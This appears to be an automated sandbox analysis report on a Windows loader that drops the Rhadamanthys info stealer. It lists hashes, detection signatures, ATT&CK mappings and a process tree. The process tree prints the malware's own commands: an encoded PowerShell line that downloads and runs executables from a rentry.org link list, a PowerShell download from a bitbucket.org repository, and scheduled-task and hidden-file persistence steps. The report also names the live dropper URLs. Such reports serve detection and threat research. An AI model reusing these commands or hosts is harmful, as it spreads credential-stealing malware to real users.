rhadamanthys | fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

Analysis

max time kernel
21s
max time network
32s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
12/06/2024, 06:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.exe
Size

7KB
MD5

b5e479d3926b22b59926050c29c4e761
SHA1

a456cc6993d12abe6c44f2d453d7ae5da2029e24
SHA256

fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
SHA512

09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
SSDEEP

192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Score

10^/10

rhadamanthys execution persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/interception1/interception/raw/93e92759abfc60711b71f1aca42d714cee0c37c0/L.tar

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1680 created 3016	1680	ljmfrqdk.g5r2.exe	50

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	4848	powershell.exe
4	4848	powershell.exe
11	824	powershell.exe
13	4268	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4848	powershell.exe
4268	powershell.exe
824	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 5 IoCs

pid	Process
5000	ljmfrqdk.g5r0.exe
4908	ljmfrqdk.g5r1.exe
1680	ljmfrqdk.g5r2.exe
4164	ljmfrqdk.g5r3.exe
2052	ljmfrqdk.g5r4.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	ljmfrqdk.g5r4.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
13	bitbucket.org
3	bitbucket.org
4	bitbucket.org

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	api.ipify.org
8	api.ipify.org

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3652	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe
824	powershell.exe
824	powershell.exe
824	powershell.exe
4268	powershell.exe
4268	powershell.exe
4268	powershell.exe
1680	ljmfrqdk.g5r2.exe
1680	ljmfrqdk.g5r2.exe
4488	dialer.exe
4488	dialer.exe
4488	dialer.exe
4488	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeIncreaseQuotaPrivilege	4848	powershell.exe
Token: SeSecurityPrivilege	4848	powershell.exe
Token: SeTakeOwnershipPrivilege	4848	powershell.exe
Token: SeLoadDriverPrivilege	4848	powershell.exe
Token: SeSystemProfilePrivilege	4848	powershell.exe
Token: SeSystemtimePrivilege	4848	powershell.exe
Token: SeProfSingleProcessPrivilege	4848	powershell.exe
Token: SeIncBasePriorityPrivilege	4848	powershell.exe
Token: SeCreatePagefilePrivilege	4848	powershell.exe
Token: SeBackupPrivilege	4848	powershell.exe
Token: SeRestorePrivilege	4848	powershell.exe
Token: SeShutdownPrivilege	4848	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeSystemEnvironmentPrivilege	4848	powershell.exe
Token: SeRemoteShutdownPrivilege	4848	powershell.exe
Token: SeUndockPrivilege	4848	powershell.exe
Token: SeManageVolumePrivilege	4848	powershell.exe
Token: 33	4848	powershell.exe
Token: 34	4848	powershell.exe
Token: 35	4848	powershell.exe
Token: 36	4848	powershell.exe
Token: SeDebugPrivilege	2052	ljmfrqdk.g5r4.exe
Token: SeIncreaseQuotaPrivilege	4504	wmic.exe
Token: SeSecurityPrivilege	4504	wmic.exe
Token: SeTakeOwnershipPrivilege	4504	wmic.exe
Token: SeLoadDriverPrivilege	4504	wmic.exe
Token: SeSystemProfilePrivilege	4504	wmic.exe
Token: SeSystemtimePrivilege	4504	wmic.exe
Token: SeProfSingleProcessPrivilege	4504	wmic.exe
Token: SeIncBasePriorityPrivilege	4504	wmic.exe
Token: SeCreatePagefilePrivilege	4504	wmic.exe
Token: SeBackupPrivilege	4504	wmic.exe
Token: SeRestorePrivilege	4504	wmic.exe
Token: SeShutdownPrivilege	4504	wmic.exe
Token: SeDebugPrivilege	4504	wmic.exe
Token: SeSystemEnvironmentPrivilege	4504	wmic.exe
Token: SeRemoteShutdownPrivilege	4504	wmic.exe
Token: SeUndockPrivilege	4504	wmic.exe
Token: SeManageVolumePrivilege	4504	wmic.exe
Token: 33	4504	wmic.exe
Token: 34	4504	wmic.exe
Token: 35	4504	wmic.exe
Token: 36	4504	wmic.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeIncreaseQuotaPrivilege	4504	wmic.exe
Token: SeSecurityPrivilege	4504	wmic.exe
Token: SeTakeOwnershipPrivilege	4504	wmic.exe
Token: SeLoadDriverPrivilege	4504	wmic.exe
Token: SeSystemProfilePrivilege	4504	wmic.exe
Token: SeSystemtimePrivilege	4504	wmic.exe
Token: SeProfSingleProcessPrivilege	4504	wmic.exe
Token: SeIncBasePriorityPrivilege	4504	wmic.exe
Token: SeCreatePagefilePrivilege	4504	wmic.exe
Token: SeBackupPrivilege	4504	wmic.exe
Token: SeRestorePrivilege	4504	wmic.exe
Token: SeShutdownPrivilege	4504	wmic.exe
Token: SeDebugPrivilege	4504	wmic.exe
Token: SeSystemEnvironmentPrivilege	4504	wmic.exe
Token: SeRemoteShutdownPrivilege	4504	wmic.exe
Token: SeUndockPrivilege	4504	wmic.exe
Token: SeManageVolumePrivilege	4504	wmic.exe
Token: 33	4504	wmic.exe
Token: 34	4504	wmic.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 1448 wrote to memory of 4848	1448	Loader.exe	73
PID 1448 wrote to memory of 4848	1448	Loader.exe	73
PID 4848 wrote to memory of 5000	4848	powershell.exe	76
PID 4848 wrote to memory of 5000	4848	powershell.exe	76
PID 4848 wrote to memory of 5000	4848	powershell.exe	76
PID 4848 wrote to memory of 4908	4848	powershell.exe	77
PID 4848 wrote to memory of 4908	4848	powershell.exe	77
PID 4848 wrote to memory of 4908	4848	powershell.exe	77
PID 4848 wrote to memory of 1680	4848	powershell.exe	78
PID 4848 wrote to memory of 1680	4848	powershell.exe	78
PID 4848 wrote to memory of 1680	4848	powershell.exe	78
PID 4848 wrote to memory of 4164	4848	powershell.exe	79
PID 4848 wrote to memory of 4164	4848	powershell.exe	79
PID 4848 wrote to memory of 2052	4848	powershell.exe	80
PID 4848 wrote to memory of 2052	4848	powershell.exe	80
PID 5000 wrote to memory of 4540	5000	ljmfrqdk.g5r0.exe	83
PID 4908 wrote to memory of 596	4908	ljmfrqdk.g5r1.exe	82
PID 5000 wrote to memory of 4540	5000	ljmfrqdk.g5r0.exe	83
PID 4908 wrote to memory of 596	4908	ljmfrqdk.g5r1.exe	82
PID 4540 wrote to memory of 5060	4540	cmd.exe	87
PID 4540 wrote to memory of 5060	4540	cmd.exe	87
PID 2052 wrote to memory of 2060	2052	ljmfrqdk.g5r4.exe	88
PID 2052 wrote to memory of 2060	2052	ljmfrqdk.g5r4.exe	88
PID 596 wrote to memory of 4548	596	cmd.exe	89
PID 596 wrote to memory of 4548	596	cmd.exe	89
PID 4540 wrote to memory of 992	4540	cmd.exe	90
PID 4540 wrote to memory of 992	4540	cmd.exe	90
PID 2052 wrote to memory of 1292	2052	ljmfrqdk.g5r4.exe	91
PID 2052 wrote to memory of 1292	2052	ljmfrqdk.g5r4.exe	91
PID 2052 wrote to memory of 4504	2052	ljmfrqdk.g5r4.exe	92
PID 2052 wrote to memory of 4504	2052	ljmfrqdk.g5r4.exe	92
PID 4540 wrote to memory of 1104	4540	cmd.exe	93
PID 4540 wrote to memory of 1104	4540	cmd.exe	93
PID 596 wrote to memory of 824	596	cmd.exe	94
PID 596 wrote to memory of 824	596	cmd.exe	94
PID 4540 wrote to memory of 2612	4540	cmd.exe	96
PID 4540 wrote to memory of 2612	4540	cmd.exe	96
PID 4540 wrote to memory of 1884	4540	cmd.exe	97
PID 4540 wrote to memory of 1884	4540	cmd.exe	97
PID 4540 wrote to memory of 3652	4540	cmd.exe	98
PID 4540 wrote to memory of 3652	4540	cmd.exe	98
PID 4540 wrote to memory of 5100	4540	cmd.exe	99
PID 4540 wrote to memory of 5100	4540	cmd.exe	99
PID 5100 wrote to memory of 2040	5100	cmd.exe	100
PID 5100 wrote to memory of 2040	5100	cmd.exe	100
PID 4540 wrote to memory of 4208	4540	cmd.exe	101
PID 4540 wrote to memory of 4208	4540	cmd.exe	101
PID 4208 wrote to memory of 68	4208	cmd.exe	102
PID 4208 wrote to memory of 68	4208	cmd.exe	102
PID 4540 wrote to memory of 4268	4540	cmd.exe	103
PID 4540 wrote to memory of 4268	4540	cmd.exe	103
PID 1680 wrote to memory of 4488	1680	ljmfrqdk.g5r2.exe	104
PID 1680 wrote to memory of 4488	1680	ljmfrqdk.g5r2.exe	104
PID 1680 wrote to memory of 4488	1680	ljmfrqdk.g5r2.exe	104
PID 1680 wrote to memory of 4488	1680	ljmfrqdk.g5r2.exe	104
PID 1680 wrote to memory of 4488	1680	ljmfrqdk.g5r2.exe	104

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2060	attrib.exe
1292	attrib.exe

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:3016
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4488

C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe
    "C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5000
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7F53.tmp\7F53.tmp\7F54.bat C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4540
    - - C:\Windows\system32\chcp.com
        
        chcp 1251
        5⤵
        
        PID:5060
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:992
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:1104
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:2612
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /query /tn "MyBatchScript"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
        5⤵
        Creates scheduled task(s)
        
        PID:3652
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5100
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
        6⤵
        
        PID:2040
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4208
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
        6⤵
        
        PID:68
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/interception1/interception/raw/93e92759abfc60711b71f1aca42d714cee0c37c0/L.tar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4268
- - C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe
    "C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4908
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7F52.tmp\7F53.tmp\7F54.bat C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:596
    - - C:\Windows\system32\where.exe
        
        where node
        5⤵
        
        PID:4548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:824
- - C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe
    "C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1680
- - C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe
    "C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe"
    3⤵
    - Executes dropped EXE
    PID:4164
- - C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe
    "C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2052
  - - C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe
      4⤵
      Views/modifies file attributes
      PID:2060
  - - C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      4⤵
      Views/modifies file attributes
      PID:1292
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
91897de07fcb115c5f42cf4c7a984982

SHA1
4903ea814fed6c31b62b394cc9eb024d107b1834

SHA256
bb34e4a3e0dd9623e77f569dbd0093b19dd43e91bb911dc7758e09fb4a53f789

SHA512
54fbd604758c7bc66151018d18bdb140d26e8dcc5d03e974197b0f3b63946eb338bf323f80b4a3e02fd109337cc1c7c8389eb15b17e0d55fced35a0398efcf4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
45d62890ffc360398bca85751bac0ade

SHA1
68f3f439c4a1f5cb02073d4af55c6854bd775e95

SHA256
66cff04910713a4690f24354994e974bb08fc5a0379b8c4eb48d134bb5a84e74

SHA512
3d07a452094aa55035e3d6d0970d0cb332f6d3f1c0c2c8667c71b98f9b280dae17709b7340ac5a47c76b44e86b7a21181d410f5c922a4aaf73717c6d45a07e29

Download Submit
C:\Users\Admin\AppData\Local\Temp\7F52.tmp\7F53.tmp\7F54.bat

Filesize
1KB

MD5
c767a4ce4fc8d490fb2af1daa95a84c6

SHA1
a198c337f2f3eac7ea75ed82f6a765e2f8bcda92

SHA256
c2fdf52cc1547c64a984e5e04b13d2fbd4a8e7b4c8f7d738f1c8618c9fe0613c

SHA512
cbcc782ea2af0594ed15cfcf243d22da61d27b63ec7e6dc6f394c891efd398fc64690dbeb944213c7f8f8d6589e75adc8f55c87aec8515422d51ccc5a479851f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7F53.tmp\7F53.tmp\7F54.bat

Filesize
6KB

MD5
b5d0441990b0eb32503744dc54199f44

SHA1
ff62e8b4ffb31d7d441fa65f8603946a2c0fea7a

SHA256
05bea0edc97f37ea1fb3d4ed27b1c8a372918338e98855f45cdd414d7777fc1c

SHA512
a698b650a94eba4a99336c2afa472ccc89bc22c50ee486f8cdffd96c77935bae2180166eac99e6aa5ca86a1c784259ad13311a5404a2df889d392f34139fcff5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_22ys433f.oz1.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe

Filesize
94KB

MD5
6460dff2e792fd74bfc7db3d8c747a58

SHA1
5a395e8f069c17b3f9cfd6a663ca60512b628142

SHA256
1656c23a4f17b821d523293ff4ba84b2c66a11db761782a774dd47b4c8c7667f

SHA512
808ba395708c5d0a4ebe4ca8d1a4f2011abae61c0d2a36f84af7d097ddba7262c220def4fbfc86881db52b0189f008c5f7de39574f26b3bdfb2e5b10c29eb1a9

Download Submit
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe

Filesize
88KB

MD5
c4b307c1aeca9d40de4b8ef5a7299c85

SHA1
ea7e1d5a5ef83a0f2ce119a56b441493dd1dd5bd

SHA256
56374adc264aa171a8804dbc071ec959f71d54aeefd824d16e2a2e7a427cecac

SHA512
2fce556f6ac9d005dd62907e5c852a91a0b7f777f68a1946a3ceb27440a4457de3952e25dd2e35e62474fe8ab0df1cb10a2a92b699fec776364bec54d4565bfb

Download Submit
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe

Filesize
355KB

MD5
c93d65bc0ed7ee88d266b4be759301f8

SHA1
8c0c415ba824737c61904676e7132094f5710099

SHA256
f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f

SHA512
7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1

Download Submit
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe

Filesize
5.2MB

MD5
f55fc8c32bee8f7b2253298f0a0012ba

SHA1
574c7a8f3eb378c03f58bc96252769296b20970e

SHA256
cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9

SHA512
c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a

Download Submit
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe

Filesize
9.5MB

MD5
b8c70bbe49951cb98becf2fc0bce3b7b

SHA1
9c22bea97baabb2b9a216a9cd2fce6b090338b06

SHA256
2835b997c97408baa0da7326c63278207bcb5637f6ecb2ba70b3036092e96bc6

SHA512
6b305a8a12f2ddc43af26869c9660007a190bae263f52efc7c7c398aa0756bb49087ab308270634171cc85d12506b310c28b1b63bcd7bc7f6477931f9a6edfb4

Download Submit
memory/1448-1-0x0000000000740000-0x0000000000748000-memory.dmp

Filesize
32KB

Download
memory/1448-0-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp

Filesize
4KB

Download
memory/1680-162-0x00000000772F0000-0x00000000774B2000-memory.dmp

Filesize
1.8MB

Download
memory/1680-164-0x0000000001260000-0x00000000012CD000-memory.dmp

Filesize
436KB

Download
memory/1680-91-0x0000000001260000-0x00000000012CD000-memory.dmp

Filesize
436KB

Download
memory/1680-160-0x00007FFEB7AE0000-0x00007FFEB7CBB000-memory.dmp

Filesize
1.9MB

Download
memory/1680-159-0x0000000000E40000-0x0000000001240000-memory.dmp

Filesize
4.0MB

Download
memory/1680-158-0x0000000000E40000-0x0000000001240000-memory.dmp

Filesize
4.0MB

Download
memory/4488-163-0x00000000009D0000-0x00000000009D9000-memory.dmp

Filesize
36KB

Download
memory/4488-166-0x0000000004A20000-0x0000000004E20000-memory.dmp

Filesize
4.0MB

Download
memory/4488-167-0x00007FFEB7AE0000-0x00007FFEB7CBB000-memory.dmp

Filesize
1.9MB

Download
memory/4488-169-0x00000000772F0000-0x00000000774B2000-memory.dmp

Filesize
1.8MB

Download
memory/4848-9-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-7-0x000002C226F00000-0x000002C226F22000-memory.dmp

Filesize
136KB

Download
memory/4848-11-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-12-0x000002C23F220000-0x000002C23F296000-memory.dmp

Filesize
472KB

Download
memory/4848-108-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-26-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-13-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download
memory/4848-49-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

Filesize
9.9MB

Download